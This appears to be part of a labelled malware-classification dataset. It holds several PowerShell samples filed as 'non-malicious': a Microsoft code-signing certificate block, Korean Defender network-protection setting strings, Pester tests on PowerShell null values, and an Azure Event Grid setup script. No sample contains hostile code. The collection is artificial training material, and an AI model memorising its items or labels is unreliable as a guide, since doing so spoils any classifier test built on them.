CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGmk # VntG52zOXLv/NQi+R81L2VbggcgyF7WWePXmGpP0MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAU3WOGB0b/S2xhcrGF7oBBMjRJPQ8TqDYuNzz # 1mMuiBB8q9MmTNlhWQqGiTogR531I12dKRfuPAmzLgR2ZqdbIcKn//PL/wwEb44l # rgmq1vjsM3MO0pVLdYRVex8RkUxAdwRmZJns8e5YU4aAPHAWDr+Wdjo6+3P8FPSZ # mrlljugoQc9GJ9xaDgmJHQkRXS4ebIgcSqNqrlYsoGAl9a8Wl4fhmhriHm0UToVu # lKSkzlyhDhFpj9QBsdNhInOul6SfW+5h8HC4WZn9Q8r7yLU7sWmXzNnkd3/jLZQR # Moy3IBcDLSu/d5jUgON58uQNW9L8O62Dq3HQvDvfwlXR7C0f/6GCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDDsZaz5ImUKXByvGsXg2oc2SiSJigDmYYc # D+Q4PCGSjgIGZxqPlhsNGBMyMDI0MTAyODExNDA0NS41MjhaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwAB # AAAB7jANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7R # EOOR7LzYCLXEtWgeqyOVlrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XS # GjpJhpGx59fxMJoTYWPzzD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V # 7+HhTR391TbC1beSxwXfdKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBT # bU5fcm3bhhlRNw5d04Ld15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6l # VqwbNQE11Oedn2uvRjKWEwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7r # N/HYX6cCsC2soyXG3OwCtLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC # 1dYW1jN77t5iSl5Wp1HKBp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd # +yU8sgKn9MtVnQ65s6QG72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIW # flgd/vEWfTNcPWEQj7fsWuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwC # caY/WXsb/axkxB/zCTdHSBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+ # JbMjKmTdcjmSkb5oN8qU1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwg # nr37xd+2v1/cdqYIMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSV # pBnYkzX8f8GZjaOs577F9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUzna # y2n9csfn3p6y7kYkHqtSugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPj # QwZeI6EPj/OAtpYkT7IUXqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQ # mAR9fqMNxjI3ZClVxA4wiM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7a # LSKtDzOEUNs+ZtjhznmZgUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTs # hU6G6sAYpbqdME/+/g1uer7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/ # 7XVBtFlxL/KgcQylJNnia+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5 # ZN0K8ju0vNVgF+Dv05sirPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4E # zcw7E1OhtOMf7DHgPMWf6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnN # znCpsEPZat0h+6d7ulRaWR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXji # gdKlLQPBlX+9zOoGAJhoZfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCIo6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smrGDAi # GA8yMDI0MTAyODA2MTgwMFoYDzIwMjQxMDI5MDYxODAwWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyasYAgEAMAcCAQACAhINMAcCAQACAhMsMAoCBQDqyvyYAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAAHjcl4rNXBxwyM5fS8nqOw6x8lf # 1RsFqQupShcrwC+zbx/3nFA5U2pjnyqIPRnRv3+YzZWJA86L/bFfrALFHwZFiQib # UCGunT1/7Sen3zbENCSolEjbtbHq62lXAEPeaATVETrPsonHGiwNLftMdCmo39FT # NyrlQhHRdbBt3uFBhI9545thuGJ2/+0UmSqnPkdqfpFJFQTpQULXBp1kWqWbUOh4 # XKgSaYo4MltD4LJV2caY2i1Bat6OItzYNOIJyQHt76CRJn1pmJGtL23JryESkqvd # MvekGpYuJDAsdSRy3PnzQRmMvOjZNt00Ur8dcXWMGrJ8g/ynoU/qpDG9BucxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F # 0wIwspqdpwABAAAB7jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAakWZ49LNc+zECGmfU/OrxOumS # KXlteUBClYZZm4xuwDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSV # hfq+Vdf+DPs+5EIkBz9oCS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQg4YrvCq7S # HssHwwbzF6sjf+O1VKt3mZP5Sd8ekjKw0bQwDQYJKoZIhvcNAQELBQAEggIAfypc # prz4rp/CalCjGM8pAk71LDln5a7Le3uRm/cYcVDjAJOofOu+xqOVkqIR9y8vUBp5 # 53apWWkuoSvlQ9lUFggRQrbgX3+Z2VvEjVhkoP3Kctz5Q3kPDPV/Fz+sRcICz3mU # IcsnJShrYGhWB/DQpImHBCut7alcqZCP//ssxCo+9JPK0c6HZaKZKxJNEmI7jM9g # iYssSM3NPD3HRBotOgFV8zdgxqXOhmCTIzjDNWqn4Df5XGO709ntNAZJG2h9T7F6 # HO/kediWABYUyo8YUsA12SV8qgqIzJMQmPptMBvE5cFOHf8ISkigOBXInzYGI41z # GnK79oNqQX831wDoZIf7lEFuBo4eOe7jNYbxsAzwHbuIvN/KaLSDN9O8gziGVltu # mRnoqTEWxKKbGsD24xAb/qfYMKk9YWJpq0E/jU/v9chB9j5DhG0sTneGA4M9fcpQ # sWbG3hJ9kCjoqORXKfMw28S7oJymk1nvIvU6BKmwnY8AaVr2spFUxlQ/alXPSEL9 # +ZtVqYBzSLePEylU/wM5AzDmMx0+SDaaOgWTcm/SD6sI7+WoNQZIk/avawNZnTP+ # dpmL26bJGS0USlaTQJov37fGH7u62r0PL9PDD4fdEoo8ovr6zFMTEFE/JBydX9dq # corprXOraTFxbXyvoC5e/KBsx+JkX8yB3uwnNxs= # SIG # End signature block
combined_dataset/train/non-malicious/sample_32_0.ps1
sample_32_0.ps1
%이 설정은 네트워크 보호에 대한 DNS 구문 분석을 비활성화합니다.)이 설정은 네트워크 보호에 대한 DNS TCP 구문 분석을 비활성화합니다.%이 설정은 네트워크 보호에 대한 SSH 구문 분석을 비활성화합니다.i관리자가 특정 채널(링)에서 Microsoft Defender 플랫폼 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.베타미리 보기준비됨넓은지연됨h관리자가 특정 채널(링)에서 Microsoft Defender 엔진 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.n관리자가 특정 채널(링)에서 Microsoft Defender 보안 인텔리전스 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.A관리자가 엔진, 플랫폼 및 보안 인텔리전스 업데이트에 대한 점진적 릴리스 프로세스를 옵트아웃할 수 있도록 허용합니다.l이 설정은 RS3의 Windows 하위에서 네트워크 보호를 차단 또는 감사 모드로 구성할 수 있는지 여부를 제어합니다. false이면 EnableNetworkProtection 값이 무시됩니다.ˆ이 설정은 네트워크 보호가 Windows Server에서 데이터그램 처리를 사용하도록 허용할지 여부를 제어합니다. false이면 DisableDatagramProcessing 값이 무시되고 데이터그램 검사를 사용하지 않도록 기본값이 설정됩니다.p이 설정을 사용하면 차단 및 감사에 대한 EnableNetworkProtection 값을 존중하며 검사 모드에서는 아무 작업도 수행하지 않는 네트워크 보호용 DNS 싱크케일 기능을 사용할 수 있습니다.'이 설정은 네트워크 보호에 대한 인바운드 연결 필터링을 비활성화합니다.
combined_dataset/train/non-malicious/2112.ps1
2112.ps1
using namespace System.Management.Automation.Internal Describe 'Null Representatives' -Tags 'CI' { Context 'Comparisons with $null' { BeforeAll { $TestValues = @( @{ Value = { [AutomationNull]::Value } } @{ Value = { [DBNull]::Value } } @{ Value = { [NullString]::Value } } ) } It '<Value> should be equivalent to $null (RHS: $null)' -TestCases $TestValues { param($Value) $Value.InvokeReturnAsIs() -eq $null | Should -BeTrue } It '$null should be equivalent to <Value> (LHS: $null)' -TestCases $TestValues { param($Value) $null -eq $Value.InvokeReturnAsIs() | Should -BeTrue } } Context 'Comparisons with other null representatives' { It 'DBNull should not be equal to NullString' { [DBNull]::Value -eq [NullString]::Value | Should -BeFalse [NullString]::Value -eq [DBNull]::Value | Should -BeFalse } } Context 'Casting Behaviour' { BeforeAll { $TestValues = @( @{ Value = { $null } } @{ Value = { [DBNull]::Value } } @{ Value = { [NullString]::Value } } @{ Value = { [AutomationNull]::Value } } ) } It '<Value> should cast to $false' -TestCases $TestValues { param($Value) [bool]($Value.InvokeReturnAsIs()) | Should -BeFalse } It '-not <Value> should be $true' -TestCases $TestValues { param($Value) -not $Value.InvokeReturnAsIs() | Should -BeTrue } It '<Value> should be treated as $false by Where-Object' -TestCases $TestValues { param($Value) 100 | Where-Object { $Value.InvokeReturnAsIs() } | Should -BeNullOrEmpty } } Context 'Collection Comparisons' { BeforeAll { $NullArray = $null, $null, [DBNull]::Value, $null, $null, [NullString]::Value } It '<Value> should correctly filter the array and return <ExpectedCount> results' { param($Value, $ExpectedCount) $NullArray -eq $Value | Should -HaveCount $ExpectedCount } -TestCases @( @{ Value = $null; ExpectedCount = 6 } @{ Value = [DBNull]::Value; ExpectedCount = 5 } @{ Value = [NullString]::Value; ExpectedCount = 5 } ) } }
combined_dataset/train/non-malicious/1007.ps1
1007.ps1
$myTopic = "<your-custom-topic-name>" $myEndpoint = "<your-endpoint-URL>" $myResourceGroup = "<resource-group-name>" New-AzResourceGroup -Name $myResourceGroup -Location westus2 $topicID = (New-AzEventGridTopic -ResourceGroupName $myResourceGroup -Name $myTopic -Location westus2).Id New-AzEventGridSubscription ` -ResourceId $topicID ` -EventSubscriptionName demoSubscription ` -Endpoint $myEndpoint
combined_dataset/train/non-malicious/sample_25_81.ps1
sample_25_81.ps1
